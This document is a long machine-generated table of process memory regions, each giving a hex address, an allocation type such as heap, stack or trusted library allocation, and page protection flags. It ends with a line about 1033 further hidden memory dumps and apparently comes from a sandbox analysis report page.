page read and write
7FF470010000
trusted library allocation
page execute and read and write
18ED57E000
unkown
page readonly
4D2D000
stack
page read and write
42F0000
trusted library allocation
page read and write
13D8E2F2000
heap
page read and write
1C0B5000
heap
page read and write
7FFD9B76D000
trusted library allocation
page execute and read and write
1EBF000
trusted library allocation
page read and write
13D88DA0000
trusted library section
page read and write
13358000
trusted library allocation
page read and write
1950000
heap
page read and write
1910000
heap
page read and write
7FFD9B836000
trusted library allocation
page read and write
520000
heap
page read and write
7FFD9B76A000
trusted library allocation
page read and write
115E000
heap
page read and write
7FFD9BAA7000
trusted library allocation
page read and write
7FFD9B83C000
trusted library allocation
page execute and read and write
20FF2700000
heap
page read and write
1655000
heap
page read and write
17B6000
trusted library allocation
page execute and read and write
7FFD9B970000
trusted library allocation
page execute and read and write
1780000
trusted library allocation
page read and write
7FFD9B7A0000
trusted library allocation
page read and write
261F5356000
heap
page read and write
1AD20000
heap
page read and write
1370000
heap
page read and write
7FFD9B9A7000
trusted library allocation
page read and write
7FFD9B9C0000
trusted library allocation
page execute and read and write
26180238000
trusted library allocation
page read and write
14F1000
heap
page read and write
26180089000
trusted library allocation
page read and write
20FF2502000
trusted library allocation
page read and write
2618065F000
trusted library allocation
page read and write
1C13E000
stack
page read and write
4340000
trusted library allocation
page read and write
C1D000
unkown
page readonly
261F5330000
heap
page read and write
7FFD9B830000
trusted library allocation
page read and write
261F5500000
heap
page read and write
122E1000
trusted library allocation
page read and write
13D8E470000
trusted library allocation
page read and write
594000
heap
page read and write
1B820000
heap
page read and write
44FB000
heap
page read and write
1AC8E000
heap
page read and write
F503E7E000
stack
page read and write
17C7000
trusted library allocation
page execute and read and write
7FFD9B7A4000
trusted library allocation
page read and write
7FFD9BAA0000
trusted library allocation
page read and write
1410000
trusted library allocation
page read and write
146B000
heap
page read and write
20FF2613000
heap
page read and write
1C1D0000
heap
page execute and read and write
261F7BA3000
heap
page read and write
18EDBFE000
stack
page read and write
20FF2700000
heap
page read and write
7FFD9BA50000
trusted library allocation
page read and write
2618085E000
trusted library allocation
page read and write
13D88E96000
heap
page read and write
5DE000
heap
page read and write
2618066F000
trusted library allocation
page read and write
7FFD9B782000
trusted library allocation
page read and write
1AC86000
heap
page read and write
1BC80000
trusted library allocation
page read and write
1C0AD000
heap
page read and write
7FFD9B928000
trusted library allocation
page read and write
13D8E261000
heap
page read and write
7FFD9B836000
trusted library allocation
page read and write
261F7D00000
heap
page read and write
F503C7D000
stack
page read and write
13D89891000
trusted library allocation
page read and write
7FFD9B940000
trusted library allocation
page read and write
261F5660000
heap
page read and write
7FFD9B7AD000
trusted library allocation
page execute and read and write
7FFD9B763000
trusted library allocation
page read and write
7FFD9BA25000
trusted library allocation
page read and write
16CF000
stack
page read and write
261F6E50000
heap
page read and write
1BBE0000
heap
page read and write
7FFD9B960000
trusted library allocation
page read and write
18ED07E000
unkown
page readonly
7FFD9B907000
trusted library allocation
page read and write
2619012F000
trusted library allocation
page read and write
44C0000
heap
page read and write
5950000
trusted library allocation
page execute and read and write
6AE000
heap
page read and write
2E17000
trusted library allocation
page read and write
26180234000
trusted library allocation
page read and write
7FFD9B93B000
trusted library allocation
page read and write
261F7D16000
heap
page read and write
4C90000
trusted library allocation
page read and write
4360000
trusted library allocation
page read and write
1FCE000
trusted library allocation
page read and write
261F9288000
heap
page read and write
5E0000
unkown
page readonly
1915000
heap
page read and write
1AC7D000
heap
page read and write
6250000
heap
page read and write
122ED000
trusted library allocation
page read and write
18ECB7E000
stack
page read and write
13D88E78000
heap
page read and write
13D8E570000
trusted library allocation
page read and write
198E000
stack
page read and write
7FFD9B92F000
trusted library allocation
page read and write
26180001000
trusted library allocation
page read and write
13D8E302000
heap
page read and write
13D89E70000
trusted library section
page readonly
1438000
heap
page read and write
1332E000
trusted library allocation
page read and write
7FFD9B9AE000
trusted library allocation
page read and write
18EDF7E000
unkown
page readonly
7FFD9BB1C000
trusted library allocation
page read and write
1746000
trusted library allocation
page execute and read and write
5AD0000
heap
page read and write
7FFD9B780000
trusted library allocation
page read and write
7FFD9B792000
trusted library allocation
page read and write
F503A7E000
stack
page read and write
18ECF7C000
stack
page read and write
55CE000
stack
page read and write
7FFD9B957000
trusted library allocation
page read and write
7FFD9BB90000
trusted library allocation
page execute and read and write
7FFD9BAF0000
trusted library allocation
page read and write
261F7D58000
heap
page read and write
133E000
stack
page read and write
7FFD9B905000
trusted library allocation
page read and write
675000
heap
page read and write
7FFD9B925000
trusted library allocation
page read and write
1CF0000
trusted library allocation
page read and write
261F99B0000
heap
page read and write
35D0000
trusted library allocation
page read and write
5690000
trusted library allocation
page read and write
261804C8000
trusted library allocation
page read and write
261F9989000
heap
page read and write
345F000
stack
page read and write
13D88E91000
heap
page read and write
7FFD9B770000
trusted library allocation
page read and write
4351000
trusted library allocation
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
F5032FE000
stack
page read and write
4C20000
trusted library allocation
page read and write
21A2000
trusted library allocation
page read and write
2618007D000
trusted library allocation
page read and write
4C60000
trusted library allocation
page read and write
1600000
trusted library allocation
page read and write
170E000
stack
page read and write
F50437F000
stack
page read and write
261F536C000
heap
page read and write
142D000
trusted library allocation
page execute and read and write
13D8E455000
trusted library allocation
page read and write
18ED4FE000
stack
page read and write
2618057C000
trusted library allocation
page read and write
122EF000
trusted library allocation
page read and write
13D8E470000
trusted library allocation
page read and write
261806B9000
trusted library allocation
page read and write
7FFD9B7AB000
trusted library allocation
page execute and read and write
FD0000
heap
page read and write
1BBA9000
heap
page read and write
21D0000
heap
page execute and read and write
5C1D000
stack
page read and write
12E21000
trusted library allocation
page read and write
13D8E510000
trusted library allocation
page read and write
47B0000
trusted library allocation
page read and write
261807DC000
trusted library allocation
page read and write
1BDBF000
stack
page read and write
261F7050000
trusted library allocation
page read and write
13D8E5E0000
remote allocation
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
13D8F000000
heap
page read and write
1159000
heap
page read and write
18ED5FE000
stack
page read and write
18EDD7E000
unkown
page readonly
7FFD9B945000
trusted library allocation
page read and write
3300000
heap
page execute and read and write
18ED47E000
unkown
page readonly
261F7BA0000
heap
page read and write
4430000
trusted library allocation
page read and write
13D88E7B000
heap
page read and write
1ABCB000
heap
page read and write
331E000
stack
page read and write
13D8E510000
trusted library allocation
page read and write
7FFD9B92C000
trusted library allocation
page read and write
18ED87E000
unkown
page readonly
26190357000
trusted library allocation
page read and write
26180539000
trusted library allocation
page read and write
1BA60000
heap
page execute and read and write
261F9B19000
heap
page read and write
4302000
trusted library allocation
page read and write
7FFD9B975000
trusted library allocation
page read and write
7FFD9B783000
trusted library allocation
page execute and read and write
7FFD9BA90000
trusted library allocation
page read and write
114E000
stack
page read and write
7FFD9BA00000
trusted library allocation
page read and write
261F5680000
heap
page read and write
13D88D60000
heap
page read and write
7FFD9B83C000
trusted library allocation
page execute and read and write
31EE000
stack
page read and write
13D8E2E9000
heap
page read and write
13D8E440000
trusted library allocation
page read and write
5F3000
unkown
page readonly
10DA000
heap
page read and write
7FFD9B97C000
trusted library allocation
page read and write
17A0000
heap
page read and write
18ED8FE000
stack
page read and write
31A0000
heap
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
7FFD9B78D000
trusted library allocation
page execute and read and write
7FFD9B7A0000
trusted library allocation
page read and write
261803F3000
trusted library allocation
page read and write
13D8E2E5000
heap
page read and write
18EDE7E000
stack
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
136E000
stack
page read and write
1C736000
stack
page read and write
5E1000
unkown
page execute read
18ECD7C000
stack
page read and write
261F99DA000
heap
page read and write
261F7D33000
heap
page read and write
261F7D4B000
heap
page read and write
2618001A000
trusted library allocation
page read and write
13D8E44E000
trusted library allocation
page read and write
3274000
trusted library allocation
page read and write
18E3000
heap
page execute and read and write
14E2000
heap
page read and write
F50397E000
stack
page read and write
20FF241B000
unkown
page read and write
7FFD9B940000
trusted library allocation
page read and write
13D89E60000
trusted library section
page readonly
444A000
trusted library allocation
page read and write
1090000
heap
page read and write
261F5520000
heap
page read and write
261807D5000
trusted library allocation
page read and write
431E000
trusted library allocation
page read and write
261F9B12000
heap
page read and write
7FFD9BAB0000
trusted library allocation
page read and write
1020000
heap
page read and write
261F9A8C000
heap
page read and write
261F9400000
heap
page read and write
7FFD9BC00000
trusted library allocation
page read and write
17CB000
trusted library allocation
page execute and read and write
7FFD9B910000
trusted library allocation
page read and write
32DF000
trusted library allocation
page read and write
13D8E5A0000
trusted library allocation
page read and write
261F53CC000
heap
page read and write
7FFD9BB10000
trusted library allocation
page read and write
13D89E50000
trusted library section
page readonly
7FFD9B9E0000
trusted library allocation
page read and write
18EE97E000
unkown
page readonly
7FFD9B8F0000
trusted library allocation
page read and write
261F9938000
heap
page read and write
590000
heap
page read and write
261F6EED000
heap
page read and write
1ABD1000
heap
page read and write
7FFD9B978000
trusted library allocation
page read and write
4380000
heap
page execute and read and write
530000
heap
page read and write
261F5336000
heap
page read and write
3523000
trusted library allocation
page read and write
13D8E5E0000
remote allocation
page read and write
C26000
unkown
page readonly
1ABE0000
heap
page read and write
1040000
heap
page read and write
13D88E00000
heap
page read and write
13BB000
heap
page read and write
1332C000
trusted library allocation
page read and write
584E000
stack
page read and write
261F56A5000
heap
page read and write
1BBB5000
heap
page read and write
4C8F000
trusted library allocation
page read and write
7FFD9B780000
trusted library allocation
page read and write
17A5000
heap
page read and write
1430000
heap
page read and write
13D8A1F0000
trusted library allocation
page read and write
1F03000
trusted library allocation
page read and write
550000
heap
page read and write
94EF35D000
stack
page read and write
13D88EA0000
heap
page read and write
261F5635000
heap
page read and write
7FFD9BA60000
trusted library allocation
page read and write
20FF2411000
unkown
page read and write
1420000
trusted library allocation
page read and write
7FFD9B920000
trusted library allocation
page read and write
594B000
stack
page read and write
7FFD9BB00000
trusted library allocation
page read and write
7FFD9B970000
trusted library allocation
page read and write
2E4E000
trusted library allocation
page read and write
13321000
trusted library allocation
page read and write
13D8E5E0000
remote allocation
page read and write
1C1D3000
heap
page execute and read and write
7FFD9B903000
trusted library allocation
page read and write
596000
heap
page read and write
42E0000
trusted library allocation
page read and write
261804A6000
trusted library allocation
page read and write
1A86D000
stack
page read and write
1119000
heap
page read and write
560D000
stack
page read and write
20FF2702000
heap
page read and write
100000
unkown
page readonly
13D8E520000
trusted library allocation
page read and write
56B0000
trusted library allocation
page read and write
20FF2477000
heap
page read and write
13D8E2D5000
heap
page read and write
13D89E80000
trusted library section
page readonly
7FFD9B9B4000
trusted library allocation
page read and write
20FF2402000
unkown
page read and write
5B0000
heap
page read and write
1B00E000
stack
page read and write
13D88D90000
trusted library allocation
page read and write
7FFD9B830000
trusted library allocation
page read and write
1793000
trusted library allocation
page execute and read and write
7FFD9BB20000
trusted library allocation
page read and write
7FFD9B920000
trusted library allocation
page read and write
20FF22A0000
heap
page read and write
1250000
heap
page read and write
C24000
unkown
page read and write
F50407E000
stack
page read and write
7FFD9B79D000
trusted library allocation
page execute and read and write
261F93F4000
heap
page read and write
642000
heap
page read and write
1742000
trusted library allocation
page read and write
13D8E2E7000
heap
page read and write
1728000
stack
page read and write
4F4000
stack
page read and write
7FFD9BB30000
trusted library allocation
page read and write
6100000
heap
page read and write
7FFD9B931000
trusted library allocation
page read and write
13D88E13000
heap
page read and write
D8D000
stack
page read and write
1AC2C000
heap
page read and write
42D0000
trusted library allocation
page read and write
177F000
stack
page read and write
261F94B3000
heap
page read and write
13D88F13000
heap
page read and write
4335000
trusted library allocation
page read and write
DA1000
stack
page read and write
1794000
trusted library allocation
page read and write
13D8E460000
trusted library allocation
page read and write
12E2E000
trusted library allocation
page read and write
7FFD9B980000
trusted library allocation
page read and write
7FFD9BAC0000
trusted library allocation
page read and write
1CE0000
trusted library allocation
page execute and read and write
DF0000
heap
page read and write
1438000
heap
page read and write
1770000
trusted library allocation
page read and write
261F7D56000
heap
page read and write
7FFD9BA50000
trusted library allocation
page read and write
180E000
stack
page read and write
1650000
heap
page read and write
1BBC4000
heap
page read and write
13D8E420000
trusted library allocation
page read and write
13D88E73000
heap
page read and write
261F8E50000
trusted library allocation
page read and write
601000
heap
page read and write
7FFD9B942000
trusted library allocation
page read and write
1266000
heap
page read and write
1C1C0000
trusted library section
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
C11000
unkown
page execute read
7FFD9B937000
trusted library allocation
page read and write
1C836000
stack
page read and write
7FFD9B9E9000
trusted library allocation
page read and write
18E0000
heap
page execute and read and write
1B29E000
stack
page read and write
1C0A9000
heap
page read and write
9EF000
stack
page read and write
7FFD9B783000
trusted library allocation
page execute and read and write
7FFD9BC30000
trusted library allocation
page read and write
2618024C000
trusted library allocation
page read and write
1830000
trusted library allocation
page execute and read and write
10D8000
heap
page read and write
2618067B000
trusted library allocation
page read and write
7FFD9BAD4000
trusted library allocation
page read and write
219A000
trusted library allocation
page read and write
13D8E313000
heap
page read and write
26180250000
trusted library allocation
page read and write
17B0000
trusted library allocation
page read and write
44DE000
heap
page read and write
2016000
trusted library allocation
page read and write
10D0000
heap
page read and write
26180254000
trusted library allocation
page read and write
7FFD9B836000
trusted library allocation
page read and write
13D8E448000
trusted library allocation
page read and write
1AC00000
heap
page read and write
7FFD9B960000
trusted library allocation
page read and write
8C0000
trusted library allocation
page read and write
26180677000
trusted library allocation
page read and write
7FFD9B7A0000
trusted library allocation
page read and write
1380000
heap
page read and write
7FFD9B950000
trusted library allocation
page read and write
13D8E242000
heap
page read and write
3321000
trusted library allocation
page read and write
7FFD9B90F000
trusted library allocation
page read and write
20FF2380000
trusted library allocation
page read and write
7FFD9BB10000
trusted library allocation
page read and write
2618023C000
trusted library allocation
page read and write
261F77B5000
heap
page read and write
1473000
heap
page read and write
1730000
trusted library allocation
page read and write
7FFD9B9E1000
trusted library allocation
page read and write
7FFD9B754000
trusted library allocation
page read and write
1C9A6000
heap
page read and write
184E000
stack
page read and write
17B2000
trusted library allocation
page read and write
17BA000
trusted library allocation
page execute and read and write
7FFD9BC60000
trusted library allocation
page read and write
F503D7D000
stack
page read and write
1BB59000
heap
page read and write
13D8E300000
heap
page read and write
1BA95000
heap
page read and write
13D8E254000
heap
page read and write
94EF77E000
stack
page read and write
315E000
stack
page read and write
1099000
heap
page read and write
1B352000
unkown
page readonly
570C000
stack
page read and write
4ADF000
stack
page read and write
7FFD9B7AD000
trusted library allocation
page execute and read and write
261F9A75000
heap
page read and write
16FE000
stack
page read and write
1790000
trusted library allocation
page read and write
1C09F000
heap
page read and write
18EE17E000
unkown
page readonly
3F4E000
stack
page read and write
7FFD9BA20000
trusted library allocation
page read and write
7FFD9BA80000
trusted library allocation
page read and write
1BA90000
heap
page read and write
1BBA2000
heap
page read and write
7FFD9B980000
trusted library allocation
page execute and read and write
13F6000
heap
page read and write
13D8E30E000
heap
page read and write
7FFD9BA40000
trusted library allocation
page read and write
1640000
heap
page execute and read and write
7FFD9B977000
trusted library allocation
page read and write
1BE0000
trusted library allocation
page read and write
1FC6000
trusted library allocation
page read and write
261807E5000
trusted library allocation
page read and write
13D88EFF000
heap
page read and write
547A000
stack
page read and write
261803F5000
trusted library allocation
page read and write
179D000
trusted library allocation
page execute and read and write
7FFD9BA11000
trusted library allocation
page read and write
20FF2413000
unkown
page read and write
261F9A91000
heap
page read and write
7FFD9BAD0000
trusted library allocation
page read and write
1D877000
heap
page read and write
7FFD9BB30000
trusted library allocation
page read and write
261F7760000
heap
page read and write
7FFD9B980000
trusted library allocation
page read and write
4C40000
trusted library allocation
page read and write
261F56A0000
heap
page read and write
1424000
trusted library allocation
page read and write
261801E6000
trusted library allocation
page read and write
4820000
unkown
page readonly
7FFD9BB50000
trusted library allocation
page read and write
13D8E22E000
heap
page read and write
7FFD9B79D000
trusted library allocation
page execute and read and write
1377000
heap
page read and write
1C9A9000
heap
page read and write
13D8E311000
heap
page read and write
261F534C000
heap
page read and write
13D89EA0000
trusted library section
page readonly
615000
heap
page read and write
261803D9000
trusted library allocation
page read and write
17A0000
trusted library allocation
page read and write
20FF2602000
heap
page read and write
26190069000
trusted library allocation
page read and write
59CE000
stack
page read and write
1456000
heap
page read and write
1260000
heap
page read and write
1C09D000
heap
page read and write
13D89B40000
trusted library allocation
page read and write
18ECE7E000
unkown
page readonly
7FFD9BB43000
trusted library allocation
page read and write
499E000
stack
page read and write
3310000
heap
page read and write
13D8E440000
trusted library allocation
page read and write
26180240000
trusted library allocation
page read and write
261F9A04000
heap
page read and write
8E6000
heap
page read and write
F86000
heap
page read and write
26180244000
trusted library allocation
page read and write
There are 1033 hidden memdumps, click here to show them.